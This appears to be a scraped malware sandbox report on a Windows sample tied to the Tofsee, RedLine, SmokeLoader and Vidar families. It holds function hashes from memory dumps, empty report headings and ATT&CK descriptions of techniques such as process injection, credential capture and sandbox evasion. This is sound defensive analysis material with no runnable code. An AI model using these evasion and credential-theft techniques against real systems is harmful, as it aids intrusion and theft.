Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 868dd0a5668ca18342ef812debbe4deea651c2a843004d9ff10ad46c349b6c82
Instruction ID: f045c085f467cd8a296f7acfc78c4605b9d0011c9ae1bc7a77a71913b6af83f9
Opcode Fuzzy Hash: 868dd0a5668ca18342ef812debbe4deea651c2a843004d9ff10ad46c349b6c82
Instruction Fuzzy Hash: 3AF090B2600529ABD7249A48C489E5AB7A9FB84330F52C115E5199B342CB30FC439BD4

Uniqueness

Uniqueness Score: -1.00%

Function 0573ED01, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96a3da4d0bd6141a0d9876111d765f32d685603f40c3a2380284837ef5351871
Instruction ID: 9e68cbf834a3d83fa545dfcc3e249f0a5e447c1f0fa1a87847668c2a5922307e
Opcode Fuzzy Hash: 96a3da4d0bd6141a0d9876111d765f32d685603f40c3a2380284837ef5351871
Instruction Fuzzy Hash: E5F0E9B27004259FC3189A89C40575AF3AFFBC1629F55802AD425AF748CB71EC56C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 0573DF38, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccaff5e95a359550a3a09ab451c69feac1a12348fd8cc52b881138920d8da9a5
Instruction ID: 7de154044e549f4ceaef22a867ef6c918e9c72e80c1001dd7900b28c67fd76ab
Opcode Fuzzy Hash: ccaff5e95a359550a3a09ab451c69feac1a12348fd8cc52b881138920d8da9a5
Instruction Fuzzy Hash: A5F090727102006FE314DB74E845AA6B7B6FFC9324B40466AE44AC7751DB31BC01C780

Uniqueness

Uniqueness Score: -1.00%

Function 0573DF48, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f0706d6e159a580687a21c4d3e6c148d1e100a6137bdc4a9cb25d47a72d1601
Instruction ID: 38cc41e87ca241491f1b18fe2782c6fdeeb9eb4dc2ab6cc325f121abc3b61fde
Opcode Fuzzy Hash: 4f0706d6e159a580687a21c4d3e6c148d1e100a6137bdc4a9cb25d47a72d1601
Instruction Fuzzy Hash: 24F03471314205AFD314DB25E84586ABBB6FBC9314740866AE84AC7B61DB71AC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 057377DB, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ca43da87cb7b6bf63f8386e8381fde80447c58b0e3d75a529d5de0a09c8c9c
Instruction ID: 326f36fe8f0b02659b851bed92e99de7c10cba9d2ba37bc29dda4ba937f447ac
Opcode Fuzzy Hash: c6ca43da87cb7b6bf63f8386e8381fde80447c58b0e3d75a529d5de0a09c8c9c
Instruction Fuzzy Hash: 4EF0A0B1704000CFCB48DFA8C5569F937F6EB8463474140E6E206CB332DA61EE00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0573D728, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca178eb7fc34f55a3e604348bb16e10f7879ffe379b4458034f92d1c91ec9f12
Instruction ID: b1fa0382583fb81db31ae5ed3dca78b1cb57cc8d03dadbca64797701c45c7b38
Opcode Fuzzy Hash: ca178eb7fc34f55a3e604348bb16e10f7879ffe379b4458034f92d1c91ec9f12
Instruction Fuzzy Hash: 4BE092F63081124FEB249B24E106AE57FE6FB483A5B0542A5D40DC7693CB24E945DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 05733EAA, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f725f0079a78234fe9f81a01dde0ad7c1bfbf102ad16a3a9eca036f48567c9e
Instruction ID: 2c0909d47872ef2828ed42c2a4369a916861c5dbea529a7da95c5fbd25398b9d
Opcode Fuzzy Hash: 3f725f0079a78234fe9f81a01dde0ad7c1bfbf102ad16a3a9eca036f48567c9e
Instruction Fuzzy Hash: C8F06D3A2002089FC700DF98C884ED27BEAFF59314B198595E948CB322E731ED15DF90

Uniqueness

Uniqueness Score: -1.00%

Function 05733EB8, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bad84ae93563c0bcb9c935af2ea69c0be271dba8c7a2267b6627b53096d7c67
Instruction ID: 631962b14791e93a28ccbe2066e05e42bc2f85f88ae88beea5a462b0b86cf35f
Opcode Fuzzy Hash: 2bad84ae93563c0bcb9c935af2ea69c0be271dba8c7a2267b6627b53096d7c67
Instruction Fuzzy Hash: 7EE0E53A2002099FC701DF59C884C927BEAFF592147198596E948CB322DB31ED55DF90

Uniqueness

Uniqueness Score: -1.00%

Function 05737038, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 568e67d1819aa791b82b12d9827eedcf8dafb95df00c5e159f000b869ab46221
Instruction ID: 6775e377387cad338f45470b3b353654f5ae30117e8165dc7a1e1e82e75f641f
Opcode Fuzzy Hash: 568e67d1819aa791b82b12d9827eedcf8dafb95df00c5e159f000b869ab46221
Instruction Fuzzy Hash: C9D02B73A1913917D7141199B803B6ABA99D781075F288073D00CD2601E920DC0113C0

Uniqueness

Uniqueness Score: -1.00%

Function 05737EE8, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e07dadd40728312157e352442162d84a7cb0d162539975a08fc762877284565
Instruction ID: 70d95fc1f1bb3765df32e08673576771e067bd9661662f11d991c0839216a0a7
Opcode Fuzzy Hash: 5e07dadd40728312157e352442162d84a7cb0d162539975a08fc762877284565
Instruction Fuzzy Hash: CAD05E76715125175715154E688987FBACEEBC8535314103AF609C7301DEA08C024691

Uniqueness

Uniqueness Score: -1.00%

Function 05737EDA, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd270baa2b6d70e73650700b13ff70d2f90c873e471c6bb193f1246f9bfd938b
Instruction ID: 58382e11f3f9b3746f0dae3c35b88b7b0df2cb4d28c05bc6707691db0d3b1a9a
Opcode Fuzzy Hash: bd270baa2b6d70e73650700b13ff70d2f90c873e471c6bb193f1246f9bfd938b
Instruction Fuzzy Hash: C3D0C2BA70112507D3054559A98A77EAACAEFC81317180136F60DD7301DEA08C038641

Uniqueness

Uniqueness Score: -1.00%

Function 0573F648, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2f6deb456da68a3bad128cfa3cf778e89abb15ab1ec3fbc689646b9e1be708
Instruction ID: 6c1c00df5d6e9324b3fbf261e66568dd91b8e87bf5958a42c003925a3bc8b067
Opcode Fuzzy Hash: 5f2f6deb456da68a3bad128cfa3cf778e89abb15ab1ec3fbc689646b9e1be708
Instruction Fuzzy Hash: 72E01237200118BBDB01DE84DC81EAA7B79EB88260F04C01AFD0487351C672DD22D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0573F658, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
Instruction ID: 877f0f7dcd895513f3842dead994786ff947c22c1e70ab8d1161cd6d10d093a9
Opcode Fuzzy Hash: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
Instruction Fuzzy Hash: 04D09E36200118BF9B05DE84DC41CA6BB6AEB89660B14C45AFD1547351CAB3ED22DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0573EDB8, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b388811d2f65db934c4baf36bb1e4bf39e99e5f851f66b08c5f2332823f72358
Instruction ID: a7e69c71c2de333d0717937574db5587e6c9f5c6164e725c406e8b5e1ed7cc31
Opcode Fuzzy Hash: b388811d2f65db934c4baf36bb1e4bf39e99e5f851f66b08c5f2332823f72358
Instruction Fuzzy Hash: 27D0C9B27002046BD604C999CC56B56B7E9DBA8614F54C029A909C7741EA32FE02D594

Uniqueness

Uniqueness Score: -1.00%

Function 057371E4, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c9a5a3f5aae5b72a0070531c6ef41650cfd2f5450553b42969e56ec82827c3
Instruction ID: b087da04928f85e68e7bd428d255af02effa8a54d655ea16e428f1501ec4cc79
Opcode Fuzzy Hash: a2c9a5a3f5aae5b72a0070531c6ef41650cfd2f5450553b42969e56ec82827c3
Instruction Fuzzy Hash: 18D0C935B04008CF8B48DFADE5515DC7BB5EF88226B4000A6E209C7220DB709D258F80

Uniqueness

Uniqueness Score: -1.00%

Function 05737279, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a3b75b031f506eca3f98fe211c07202947a6aa1db90f0ad141b4463d9519eb
Instruction ID: 95e43db85edbbcd1a7ba142a32401ccc10d691b925ebb2eb29a2728fd51b0c1b
Opcode Fuzzy Hash: 07a3b75b031f506eca3f98fe211c07202947a6aa1db90f0ad141b4463d9519eb
Instruction Fuzzy Hash: 9FD0C935B40018CF8B48DFEDE5559DD7BB5EF88225B4100A6D209CB625DB70EE158B91

Uniqueness

Uniqueness Score: -1.00%

Function 0573744C, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df6cf2ddc6834cf282daacaef6986d7118b3254da4a1f62a0d8a182ebc70b49c
Instruction ID: 3621b05e33bcfa74f127819d845d7124a32fb8ddd804a4ad4e57fd27f71e6e65
Opcode Fuzzy Hash: df6cf2ddc6834cf282daacaef6986d7118b3254da4a1f62a0d8a182ebc70b49c
Instruction Fuzzy Hash: 69D01235740004CF8B08DA9DD4545D833B6DF8422674000A6E206C7631CB709D55CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0573EDC8, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694

Uniqueness

Uniqueness Score: -1.00%

Function 05737EB2, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71421207ed6b655a1cc91a945f5966fab1ee2bfdb508678603717452f2bbf61e
Instruction ID: 67184b763f89196ca99e55318536193b3c738074008f0e720ea1f0c39ad6d041
Opcode Fuzzy Hash: 71421207ed6b655a1cc91a945f5966fab1ee2bfdb508678603717452f2bbf61e
Instruction Fuzzy Hash: 36C08C9282EAC05BDF268334943930A7E808B12220F1892CCD0EA8E3D3C5148806D762

Uniqueness

Uniqueness Score: -1.00%

Function 05737EC0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f25da1a188540eb8f2eb95b23271d8ae900a05db1933a9e130a7a0645b20842
Instruction ID: 7005ef226130beb121a75ba92b841320f9ceadd5e833bffae6c14586846cc737
Opcode Fuzzy Hash: 6f25da1a188540eb8f2eb95b23271d8ae900a05db1933a9e130a7a0645b20842
Instruction Fuzzy Hash: 87C09271522244CFDB06CF20C048804BB72AF4230535990D8E00A8F622CB32DC86CF00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report cz2ZyeL2Zd.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Tofsee

Threatname: RedLine

Threatname: SmokeLoader

Threatname: Vidar

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
